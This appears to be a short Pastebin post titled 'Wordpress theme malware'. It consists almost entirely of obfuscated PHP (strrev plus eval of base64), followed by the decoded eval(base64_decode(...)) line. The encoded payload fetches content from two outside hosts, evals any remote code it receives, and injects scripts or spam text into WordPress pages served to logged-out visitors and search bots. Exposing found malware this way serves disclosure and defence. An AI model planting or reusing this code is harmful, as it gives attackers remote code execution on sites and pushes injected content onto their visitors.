SHARE
TWEET

Wordpress theme malware

scurit Dec 15th, 2014 (edited) 225 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
  3. $wp_user_functions_init(strrev(';))"=oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphXZf52bpR3YuVnZoYWaK0gCN0nCNASfK0AI7AHJg4mc1RXZylgCNoQDK0QfJoQD9lQCK0gCN0XCJkgCN0XCJkQCK0wOxQHelRHJuAHJ9AHJJkQCJkgCNsXZzxWZ9lQCJkgCN0XCJkQCJoQD7kCckACLxQHelRHJuICIi4yZhRHJgwyZhRHJoQ3cylmZfV2YhxGclJ3XyR3c9AHJJkQCJkQCK0welNHbl1XCJkQCJoQDgsTKwRCLxQHelRHJuICIi4yZhRHJscWY0RCKlNWYsBXZyl2XyR3cA1DckkQCJkQCJoQD7lSK00TPlBXe0RCK8xXKz0TPlBXe0RCKoAiZplQCJkQCK0wepkyZhRHJsAHJoIHdzlmc0NHKgYWaJkQCJoQDK0wepkiIi0TIxQHelRHJoYiJpIiI9EyZhRHJogCImlWCJkgCNsTKxYWdiRCLiwHf8JCKlR2bsBHelBUPpEDd4VGdkwyZhRHJoQ3cpxWCJkgCNsTK0hXZ0RCKlR2bjVGZfRjNlNXYiBUPxYWdiRSCJkgCNsXK09mYkgCImlWCJoQDK0QfJkgCNsTKoAXafR3biVGbn92bn91cp1DdvJGJJkQCK0wepkyM90TZwlHdkgCf8liM90TZwlHdkgCKgYWaJkgCN0XCJoQD7kCKhV3X09mYfNXa9Q3biRSCJkgCNsXKpQTP9UGc5RHJowHfpETP9UGc5RHJogCImlWCJoQD7lSK00TPlBXe0RCK8xXKz0TPlBXe0RCK8xXKy0TPlBXe0RCK8xXKx0TPlBXe0RCKoAiZplgCNU2csVWfJoQDJkgCN0XCJoQD7EDd4VGdk4Cck0DckkQCJoQD7V2csVWfJkgCNsTKwRCIsEDd4VGdnFGdk4iIgIiLxQHelRHJgwSM0hXZ0dWY0RCK0NncpZ2XlNWYsBXZy9lc0NXPwRSCJkgCNsXKpkSM0hXZ0dWY0RCLwRCKyR3cpJHdzhiJmkiIi0TIxQHelR3ZhRHJogCImlWCJoQD9lQCK0wOzpGJuAHJ9AHJJkQCK0welNHbl1XCJoQD7kCckACLzp2ZhRHJuICIi4ycqRCIsMnanFGdkgCdzJXam9VZjFGbwVmcfJHdz1DckkQCJoQD7lSKpMnanFGdkwCckgic0NXayR3coYiJpIiI9EycqdWY0RCKoAiZplQCK0gCNsDckAibyVHdlJXKpEDd4VGdkwCckgic0NXayR3coAiZplQCK0gCNsTKxYWdiRCLiwHf8JCKlR2bsBHelBUPpEDd4VGdkwSM0hXZ0dWY0RCLzpGJsMnanFGdkgCdzlGbJkgCNsTK0hXZ0RCKlR2bjVGZfRjNlNXYiBUPxYWdiRSCJoQD7lCM90TZwlHdkgCImlWCK0wOw0DdvJGJJoQD7ATPrUGc5RHJJoQDK0wOwRCIuJXd0VmcpIiI90Dd4VGdkgCImlWCK0wOpYWdiRCLiwHf8JCKlR2bsBHelBUPpQHelRHJsUGc5RHJoQ3cpxWCK0QfJoQD7AHJg4mc1RXZylQCK0wepIiI90jZ1JGJoAiZplgCNsTXws1akAUPmVnYkkgCNoQD9lgCNsDckAibyVHdlJXCJoQD7lSK4RCKu9Wa0B3bfRXZnBSPgsGJhgCImlWCK0QfJoQD9lQCK0wOwRCIuJXd0VmcJkQCK0wepkyakwCekgibvlGdw92XlRXYkBXdhgCImlWCJoQD7kCKl1Wa01TXxs1akkQCK0wOsFmdk0TXws1akkQCK0wOpgSehJnch1zakkQCK0wOpgSO5kzXlxWam9VZ0FGZwVXPsFmdkkQCK0wepUGdhRGc1RCKgYWaJoQD9lgCNkQCK0QfJkgCNsTM9UGdhRGc1RSCJkgCNsXKyEjKwAjNz4TZtlGdjRCKgYWaJkgCNsTXxs1akAULpgSZtlGd9UWbpR3YkkQCK0welNHbl1XCK0wOx0TZ0FGZwVHJJkgCN0XCJoQD7AHJg4mc1RXZylQCJoQD7lSKn8mbnwyJnwCctVGJsgHJo42bpRHcv9FZkFWIoAiZplQCK0wOpgSehJnch1DctVGJJkgCNsXKFNFTBZUP90zakgCImlWCK0wOpgHJo42bpRHcv9FdldGI9AyakkgCNsDM9UGdhRGc1RSCK0wOiISPmVnYkkgCNszJ9NXZtFmbfNnbvlGdw92en0DekkgCNoQDK0QfJoQD7AHJg4mc1RXZylQCK0wepkiIulWbkFWLwdnIs01JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJoIHdzlmc0NHKgYWaJoQDK0QfJoQD7AHJg4mc1RXZylQCK0wepkiIul2ZvxWLwdnIs01JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJoIHdzlmc0NHKgYWaJoQDK0QfJoQD7AHJg4mc1RXZylQCK0wepkiIwhGcuMGcyxWb4JCLddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCKyR3cpJHdzhCImlWCK0gCN0XCK0wOwRCIuJXd0VmcJkgCNsHIpASKpgibp9FZld2Zvx2XyV2c191cpBiJmASKn4WafRWZnd2bs9lclNXdfNXangyc0NXa4V2Xu9Wa0Nmb1ZGKgwHfgkSXnETLl1Wa01ycn5Wa0RXZz1Cc3dyWFl0SP90QfRCK0V2czlGI8xHIp01Jx0ycn5Wa0RXZz1Cc3dyWFl0SP90QfRCK0V2czlGI8xHIp01Jll2av92YfR3clR3XzNXZyBHZy92dnsVRJt0TPN0XkgCdlN3cphCImlWCK0gCNsHIpAHJoAHaw9lbvlGdj5Wdm91ajFmYsxWYjBibvlGdj5WdmpQD7lSZzxWYm1TP9kyJwhGcf52bpR3YuVnZft2YhJGbsF2Yngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCNoQDK0QfK0QfK0wOsFmdkAibyVHdlJXCK0QfJoQD7kSKlR2bjRCKlR2bjVGZfRjNlNXYihCbhZXZJkgCNsTKsFmdkwiI8xHfFR0TDxHf8JCKlR2bsBHel1TKlR2bjRCLsFmdkgCdzlGbJkgCNsXKpICf8xXRE90Q8xHfiwCbhZHJoIHdzJHdzhCImlWCK0wOpIDbhVHdjFGJokTO58FbyV3X0V2Z9wWY2RSKiISP9wWY2RCKgYWaJoQD7kSMsFWd0NWYkgSO5kzXsJXdfRXZn1DbhZHJJoQD7kmc1RiLi8Sdy5COmRXdzpmclB3bvN2LvoDc0RHai0jMsFWd0NWYkkgCNsTayVHJuIyLt92YuMHel52brBXdw9yL6AHd0hmI9EDbhVHdjFGJJoQD7ISN3MmYyMDNkNGO2IWN3ITNwUzYmlTMwUjN1Q2M1kDM50Tam0WP09DcoBnLnJSPpJXdkkgCNoQD7lCK5kTOfVGbpZ2XlRXYkBXdg42bpR3YuVnZK0wepU2csFmZ90TPpcSO5kzXlxWam9VZ0FGZwV3JoMHdzlGel9lbvlGdj5WdmhiZppQDK0Qf9tzakAibyVHdlJ3Ox0zakkSK1kjM5MjNzITMx0DPwlGJoYiJpQDMxEzM2MjMxETP+AXakgCKgYWa7kSKdJiUERUQfVEVP1URSJyWSVkVSV0UfRCQocmbvxmMwlGQsISdlICKmRnbpJHcz1DcpRyOw0zaksXKoAXafR3biVGbn92bn91cpBibvlGdj5WdmtXKlNHbhZWP90TKnAXafR3biVGbn92bn91cpdCKzR3cphXZf52bpR3YuVnZoYWaK0Qf9tDdvJGJg4mc1RXZytTM9Q3biRSKpICdvJWZsd2bvdmIsEWdkgic0NXayR3c8xXKiQ3bidmbpJmIsEWdkgic0NXayR3coAiZptTM9Q3biRSKpIybvhWYZJCLhVHJoIHdzlmc0NHf8liI09mYuNXbiwSY1RCKyR3cpJHdzhCIml2OddCVOV0RB9lUFNVVfBFVUh0JbJVRWJVRT9FJA1TY1RyOw0DdvJGJ7lCKhV3X09mYfNXag42bpR3YuVnZ7lSZzxWYm1TP9kyJhV3X09mYfNXangyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7Q3YlpmY1NHJg4mc1RXZylQf7kSKoNmchV2ckgiblxmc0NHIsM3bwRCIsU2YhxGclJHJgwCdjVmaiV3ckgSZjFGbwVmcfJHdzJWdzBSPgQ3YlpmY1NHJJsHIpU2csFmZg0TPhAycvBHJoAiZptTKoNmchV2ckACL0NWZqJWdzRCKz9GcpJHdzBSPgM3bwRyegkCdjVmaiV3ckACLlNWYsBXZyRCIsg2YyFWZzRCK0NncpZ2XlNWYsBXZy9lc0NHIu9Wa0Nmb1Z2epU2csFmZ90TPpcCdzJXam9VZjFGbwVmcfJHdzdCKzR3cphXZf52bpR3YuVnZoYWaK0Qf9tjZ1JGJg4mc1RXZytTKmVnYkwSKwEDKyh2YukyMxgicoNmLpATMoIHaj5SKzEDKyh2YoUGZvxGc4VWPpYWdiRCLtRCK0NXastTZzxWYmBibyVHdlJXKiISP9YWdiRCKgYWa7kyaj92ckgSZz9Gbj9Fdlt2YvNHQ9tDdk0jLmVnYksXKpADMwATMss2YvNHJoQWYlJ3X0V2aj92c9QHJoUGbph2d7cyJ9YWdiRyOpQ3clVXclJHJss2YvNHJoUGdpJ3dfRXZrN2bztjIuxlbcR3cvhGJgoDdz9GSi0jL0NXZ1FXZyRyOi4GXw4SMvAFVUhEIpJXdkACVFdkI9ACdzVWdxVmck03OlNHbhZGIuJXd0Vmc7kyaj92ckgSZz9Gbj9Fdlt2YvNHQ7lSKwgDLxAXakwyaj92ckgCdjVmbu92YfRXZrN2bzBUIoAiZptTKQNEVfx0TTxSTBVkUUN1XLN0TTxCVF5USfZUQoUGdhVmcj9Fdlt2YvNHQ9s2YvNHJ7U2csFmZg4mc1RXZyliMwlGJ9ESMwlGJoAiZpByOpkSMwlGJocmbvxmMwlGQoAXaycmbvxGQ9IDcpRyOpQ3cvhGJoUWbh5WeiR3cvhGdldGQ9EDcpRyOddSeyVWdxdyWwRiLn8zJu01JoRXYwdyWwRSPpJXdksTXnQ3cvh2JbBHJ9Q3cvhGJ7kCbyVHJowmc19VZzJXYwBUPwRyOlNHbhZGIuJXd0VmcpU2csFmZ90TPpcSZ0FWZyN2X0V2aj92cngyc0NXa4V2Xu9Wa0Nmb1ZGKml2epwmc1RCK5kTOfRXZrN2bzlnc0BibvlGdj5WdmtXKlNHbhZWP90TKnkTO58Fdlt2YvNXeyR3JoMHdzlGel9lbvlGdj5WdmhiZppQD913OmVnYkAibyVHdlJ3OpYWdiRCLpATMoIHaj5SKzEDKyh2YukCMxgicoNmLpMTMoIHajhSZk9GbwhXZ9kiZ1JGJs0GJoQ3cpx2OlNHbhZGIuJXd0VmcpIiI90jZ1JGJoAiZptTKmRCKlN3bsNmZ9tTKwADMwEDLmRCKkFWZyZWPuYWdiRyepkiZkgiZvVmZhgSZslGa3tzJn0jZ1JGJ7kCdzVWdxVmckwiZkgSZ0lmc3Z2Oi4GXuxFdz9GakAiO0N3bIJSPuQ3clVXclJHJ7IibcBjLx8CUURFSgkmc1RCIUV0Ri0DI0NXZ1FXZyRyOlNHbhZGIuJXd0VmcpYGJhgiZptTKwMDLyR3cyJXZkACLv5mcyVGJsADOsQ3cvhGJo4WZw92aj92cmBUPmRyOddSeyVWdxdyWwRiLn8zJu01JoRXYwdyWwRSPpJXdksTXnQ3cvh2JbBHJ9Q3cvhGJ7kCbyVHJowmc19VZzJXYwBUPwRyOlNHbhZGIuJXd0VmcpU2csFmZ90TPpciblB3brN2bzZ2JoMHdzlGel9lbvlGdj5WdmhiZptXKsJXdkgSO5kzXuVGcvt2YvNnZ5JHdg42bpR3YuVnZ7lSZzxWYm1TP9kyJ5kTOf5WZw92aj92cmlnc0dCKzR3cphXZf52bpR3YuVnZoYWaK0Qf9tjZ1JGJg4mc1RXZytTZzxWYmBibyVHdlJXKiISP9YWdiRCKgYWa7U2csFmZg4mc1RXZyBSZzxWZ9tTKmRCKlN3bsNmZ9tTKwADMwEDLmRCKkFWZyZWPuYWdiRyepkiZkgiZvVmZhgSZslGa3tXKmRCKgYWa7kyJydCLsJXdkgiblB3bmBUPmRyOncSPmVnYksTZzxWYmBibyVHdlJXKlNHbhZWP90TKn4WZw9mZngyc0NXa4V2Xu9Wa0Nmb1ZGKml2epwmc1RCK5kTOf5WZw9mZ5JHdg42bpR3YuVnZ7lSZzxWYm1TP9kyJ5kTOf5WZw9mZ5JHdngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7YWdiRCIuJXd0Vmc7U2csFmZg4mc1RXZyliIi0TPmVnYkgCIml2OpMmbpRCLncCKlR2bsBXbpBUPmVnYksTKsJXdkgSZslmZA1zYulGJ7U2csFmZg4mc1RXZylSZzxWYm1TP9kyJlxWamdCKzR3cphXZf52bpR3YuVnZoYWa7lCbyVHJokTO58VZslmZ5JHdg42bpR3YuVnZ7lSZzxWYm1TP9kyJ5kTOfVGbpZWeyR3JoMHdzlGel9lbvlGdj5WdmhiZppQD913O0xWdzVmckAibyVHdlJ3OlNHbhZGIuJXd0VmcpIiI90DdsV3clJHJoAiZptTKoNGJoU2cvx2Yfxmc1N2Opg2YkgCIjVGel9FbyV3Yg0DI0xWdzVmcksTKwACLSVERBVESfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1N2OpUDIsQVVPVUTJR1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKxACLSVkRT5UQSRlTSVFVFJ1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKsJXdkwCTSV1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKoACdp5Wafxmc1NGI9ACajRyOlNHbhZGIuJXd0VmcpU2csFmZ90TPpcCdp5Wafxmc1N2JoMHdzlGel9lbvlGdj5WdmhiZptXKsJXdkgSO5kzXsJXdjlnc0BibvlGdj5WdmtXKlNHbhZWP90TKnkTO58FbyV3Y5JHdngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7cyJg4mc1RXZytDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzX0V2aj92c5JHdA1DduVGdu92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzXuVGcvt2YvNnZ5JHdA1DduVGdu92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzXuVGcvZWeyRHQ9QnblRnbvNGJ7QnblRnbvNGJg4mc1RXZylSZzxWYm1TPhQnblRnbvNGJoYWa7kCbyVHJokTO58VZslmZ5JHdA1DduVGdu92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzXsJXdjlnc0BUP05WZ052bjRyOiISP05WZ052bjRyepwmc1RCK5kTOfxmc19FdldGIu9Wa0Nmb1Z2epU2csFmZ90TPpcSO5kzXsJXdfRXZndCKzR3cphXZf52bpR3YuVnZoYWa"(edoced_46esab(lave'));
  4. ?>
  5.  
  6. String reverses to:
  7.  
  8. eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdnZXRfdXJsXzk5OScpPT09ZmFsc2Upe2Z1bmN0aW9uIGdldF91cmxfOTk5KCR1cmwpeyRjb250ZW50PSIiOyRjb250ZW50PUB0cnljdXJsXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5ZmlsZV85OTkoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZvcGVuXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5ZnNvY2tvcGVuXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5c29ja2V0Xzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDtyZXR1cm4gJyc7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygndHJ5Y3VybF85OTknKT09PWZhbHNlKXtmdW5jdGlvbiB0cnljdXJsXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRjaCA9IGN1cmxfaW5pdCAoKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1VSTCwkdXJsKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTskcmVzdWx0ID0gY3VybF9leGVjICgkY2gpO2N1cmxfY2xvc2UoJGNoKTtpZiAoJHJlc3VsdD09IiIpcmV0dXJuIGZhbHNlO3JldHVybiAkcmVzdWx0O319DQppZihmdW5jdGlvbl9leGlzdHMoJ3RyeWZpbGVfOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5ZmlsZV85OTkoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygndHJ5Zm9wZW5fOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5Zm9wZW5fOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCd0cnlmc29ja29wZW5fOTk5Jyk9PT1mYWxzZSl7ZnVuY3Rpb24gdHJ5ZnNvY2tvcGVuXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2Zzb2Nrb3BlbicpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRmPUBmc29ja29wZW4oJGhvc3QsODAsJGVycm5vLCAkZXJyc3RyLDMwKTtpZighJGYpcmV0dXJuIGZhbHNlOyRyZXF1ZXN0ID0iR0VUICR1cmkgSFRUUC8xLjBcbiI7JHJlcXVlc3QuPSJIb3N0OiAkaG9zdFxuXG4iO2Z3cml0ZSgkZiwkcmVxdWVzdCk7JGJ1Zj0nJzt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTtpZiAoJGJ1Zj09IiIpcmV0dXJuIGZhbHNlO2xpc3QoJG0sJGJ1Zik9ZXhwbG9kZShjaHIoMTMpLmNocigxMCkuY2hyKDEzKS5jaHIoMTApLCRidWYpO3JldHVybiAkYnVmO319DQppZihmdW5jdGlvbl9leGlzdHMoJ3RyeXNvY2tldF85OTknKT09PWZhbHNlKXtmdW5jdGlvbiB0cnlzb2NrZXRfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnc29ja2V0X2NyZWF0ZScpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRpcDE9QGdldGhvc3RieW5hbWUoJGhvc3QpOyRpcDI9QGxvbmcyaXAoQGlwMmxvbmcoJGlwMSkpOyBpZiAoJGlwMSE9JGlwMilyZXR1cm4gZmFsc2U7JHNvY2s9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTtpZiAoIUBzb2NrZXRfY29ubmVjdCgkc29jaywkaXAxLDgwKSl7QHNvY2tldF9jbG9zZSgkc29jayk7cmV0dXJuIGZhbHNlO30kcmVxdWVzdCA9IkdFVCAkdXJpIEhUVFAvMS4wXG4iOyRyZXF1ZXN0Lj0iSG9zdDogJGhvc3RcblxuIjtzb2NrZXRfd3JpdGUoJHNvY2ssJHJlcXVlc3QpOyRidWY9Jyc7d2hpbGUoJHQ9c29ja2V0X3JlYWQoJHNvY2ssMTAwMDApKXskYnVmLj0kdDt9QHNvY2tldF9jbG9zZSgkc29jayk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtsaXN0KCRtLCRidWYpPWV4cGxvZGUoY2hyKDEzKS5jaHIoMTApLmNocigxMykuY2hyKDEwKSwkYnVmKTtyZXR1cm4gJGJ1Zjt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCdzdHJfcmVwbGFjZV9maXJzdCcpPT09ZmFsc2Upe2Z1bmN0aW9uIHN0cl9yZXBsYWNlX2ZpcnN0KCRzZWFyY2gsICRyZXBsYWNlLCAkc3ViamVjdCkgeyRwb3MgPSBzdHJpcG9zKCRzdWJqZWN0LCAkc2VhcmNoKTtpZiAoJHBvcyAhPT0gZmFsc2UpIHsJJHN1YmplY3QgPSBzdWJzdHJfcmVwbGFjZSgkc3ViamVjdCwgJHJlcGxhY2UsICRwb3MsIHN0cmxlbigkc2VhcmNoKSk7fQlyZXR1cm4gJHN1YmplY3Q7fX0NCmlmKGZ1bmN0aW9uX2V4aXN0cygnaXNfYm90X3VhJyk9PT1mYWxzZSl7ZnVuY3Rpb24gaXNfYm90X3VhKCl7JGJvdD0wOyR1YT1AJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmIChzdHJpc3RyKCR1YSwibXNuYm90Iil8fHN0cmlzdHIoJHVhLCJZYWhvbyIpKSRib3Q9MTtpZiAoc3RyaXN0cigkdWEsImJpbmdib3QiKXx8c3RyaXN0cigkdWEsImdvb2dsZWJvdCIpKSRib3Q9MTtyZXR1cm4gJGJvdDt9fQ0KaWYoZnVuY3Rpb25fZXhpc3RzKCdpc19nb29nbGVib3RfaXAnKT09PWZhbHNlKXtmdW5jdGlvbiBpc19nb29nbGVib3RfaXAoKXskaz0wOyRpcD1zcHJpbnRmKCIldSIsQGlwMmxvbmcoQCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKSk7aWYgKCgkaXA+PTExMjM2MzExMDQpJiYoJGlwPD0xMTIzNjM5Mjk1KSkkaz0xO3JldHVybiAkazt9fQ0KDQppZihmdW5jdGlvbl9leGlzdHMoJ3VwZGF0ZV9maWxlXzk5OScpPT09ZmFsc2Upew0KZnVuY3Rpb24gdXBkYXRlX2ZpbGVfOTk5KCl7DQoNCgkkdXJpPSJnLnBocD90PW0maT05MDk1M2Q1NjUwMTlmYzUwNTI3NWI2OGNkNDMyYmM3NSI7DQoJJGFjdHVhbDE9Imh0dHA6Ly9wdXBrb25leHMuY29tLyIuJHVyaTsNCgkkYWN0dWFsMj0iaHR0cDovL2Nvb3BlcmpzdXRmOC5ydS8iLiR1cmk7DQoJJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMSk7DQoJaWYgKCR2YWw9PSIiKSR2YWw9Z2V0X3VybF85OTkoJGFjdHVhbDIpOw0KCWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXsNCgkJbGlzdCgkdmFsLCRjb2RlKT1leHBsb2RlKCJ8fHxDT0RFfHx8IiwkdmFsKTsNCgkJZXZhbChiYXNlNjRfZGVjb2RlKCRjb2RlKSk7DQoJfQ0KCXJldHVybiAkdmFsOw0KfQ0KfQ0KDQoNCmlmKGZ1bmN0aW9uX2V4aXN0cygnY2FsbGJhY2tfZnVuY3Rpb25fcGhwJyk9PT1mYWxzZSl7DQpmdW5jdGlvbiBjYWxsYmFja19mdW5jdGlvbl9waHAoJHApIHsNCg0KCWlmIChpc3NldCgkX0NPT0tJRVsnd29yZHByZXNzX3Rlc3RfY29va2llJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy0xJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy10aW1lLTEnXSkgfHwgKGZ1bmN0aW9uX2V4aXN0cygnaXNfdXNlcl9sb2dnZWRfaW4nKSAmJiBpc191c2VyX2xvZ2dlZF9pbigpKSApIHsNCgkJcmV0dXJuICRwOw0KCX0NCg0KCWlmIChzdHJpc3RyKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCJ4bWxycGMucGhwIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoJaWYgKHN0cmlzdHIoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sIndwLWxvZ2luIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoJaWYgKHN0cmlzdHIoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sIndwLWFkbWluIikpew0KCQlyZXR1cm4gJHA7DQoJfQ0KDQoNCgkkeD0ne29wdGlvbnNfbmFtZXN9JzsNCgkkYnVmPSIiOw0KCSR1cGRhdGU9MDsNCgkkayA9IGdldF9vcHRpb24oJHgpOw0KCWlmICgkaz09PUZBTFNFKXsNCgkJJGVtcD1hcnJheSgpOw0KCQlpZiAoIWFkZF9vcHRpb24oJHgsJGVtcCwnJywnbm8nKSl7DQoJCQlyZXR1cm4gJHA7DQoJCX0NCgkJJHVwZGF0ZT0xOw0KCX1lbHNlew0KCQkkY3RpbWU9dGltZSgpLUAka1sxXTsNCgkJaWYgKCRjdGltZT4zNjAwKjEyKXsNCgkJCSR1cGRhdGU9MTsNCgkJfQ0KCQkNCgl9DQoJaWYgKCR1cGRhdGUpew0KCQkkdmFsPXVwZGF0ZV9maWxlXzk5OSgpOw0KCQkkaz1hcnJheSgpOw0KCQkka1swXT0kdmFsOw0KCQkka1sxXT10aW1lKCk7DQoJCWlmICghdXBkYXRlX29wdGlvbigkeCwkaykpew0KCQkJcmV0dXJuICRwOw0KCQl9DQoJfQ0KCWlmICghJGsgPSBnZXRfb3B0aW9uKCR4KSl7DQoJCXJldHVybiAkcDsNCgl9DQoNCgkkYnVmPUAka1swXTsNCglpZiAoJGJ1Zj09IiIpew0KCQlyZXR1cm4gJHA7DQoJfQ0KCWxpc3QoJHR5cGUsJHRleHQpPUBleHBsb2RlKCJ8fHwiLCRidWYpOw0KCWlmICgkdGV4dD09IiIpcmV0dXJuICRwOw0KDQoJJHR5cGUrPTA7DQoJJGJvdD0wOw0KCWlmICgkdHlwZT09MCl7DQoJCSRidWYxPUBiYXNlNjRfZGVjb2RlKCR0ZXh0KTsNCgkJbGlzdCgkdGFnanMsJGpzLCR0YWd0ZXh0MSwkdGV4dDEpPUBleHBsb2RlKCJ8fHwiLCRidWYxKTsNCg0KCQlpZiAoc3RyaXN0cigkcCwkdGV4dDEpKXJldHVybiAkcDsNCg0KCQlpZiAoKCR0YWdqcyE9IiIpJiYoc3RyaXN0cigkcCwkdGFnanMpKSl7DQoJCQkkcD1zdHJfcmVwbGFjZV9maXJzdCgkdGFnanMsICRqcy4iICIuJHRhZ2pzLCAkcCk7DQoJCX1lbHNlew0KCQkJJHA9JHAuJGpzOw0KCQl9DQoJCWlmICgoJHRhZ3RleHQxIT0iIikmJihzdHJpc3RyKCRwLCR0YWd0ZXh0MSkpKXsNCgkJCSRwPXN0cl9yZXBsYWNlX2ZpcnN0KCR0YWd0ZXh0MSwgJHRleHQxLiIgIi4kdGFndGV4dDEsICRwKTsNCgkJfWVsc2V7DQoJCQkkcD0kcC4kdGV4dDE7DQoJCX0NCgkJDQoJfWVsc2UNCglpZiAoKCR0eXBlPT0xKXx8KCR0eXBlPT0yKXx8KCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7DQoJCWlmICgoJHR5cGU9PTEpfHwoJHR5cGU9PTQpKXsNCgkJCSRib3Q9aXNfYm90X3VhKCk7DQoJCX0NCgkJaWYgKCgkdHlwZT09Mil8fCgkdHlwZT09Mykpew0KCQkJJGJvdD1pc19nb29nbGVib3RfaXAoKTsNCgkJfQ0KDQoJCWlmICgkYm90KXsNCgkJCSRidWYxPUBiYXNlNjRfZGVjb2RlKCR0ZXh0KTsNCgkJCWxpc3QoJHRhZywkdGV4dDEpPUBleHBsb2RlKCJ8fHwiLCRidWYxKTsNCgkJCWlmICgoJHRhZyE9IiIpJiYoJHRleHQxIT0iIikpew0KDQoJCQkJaWYgKHN0cmlzdHIoJHAsJHRhZykpew0KCQkJCQlpZiAoKCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7DQoJCQkJCQkkcD1Ac3RyX2lyZXBsYWNlKCR0YWcsJHRhZy4iICIuJHRleHQxLCRwKTsgDQoJCQkJCX1lbHNlew0KCQkJCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZywgJHRhZy4iICIuJHRleHQxLCAkcCk7DQoJCQkJCX0NCgkJCQl9ZWxzZXsNCgkJCQkJJHA9JHAuJHRleHQxOw0KCQkJCX0NCgkJCX0NCg0KCQl9DQoJfQ0KDQoNCglyZXR1cm4gJHA7IA0KfSANCn0NCg0KaWYoZ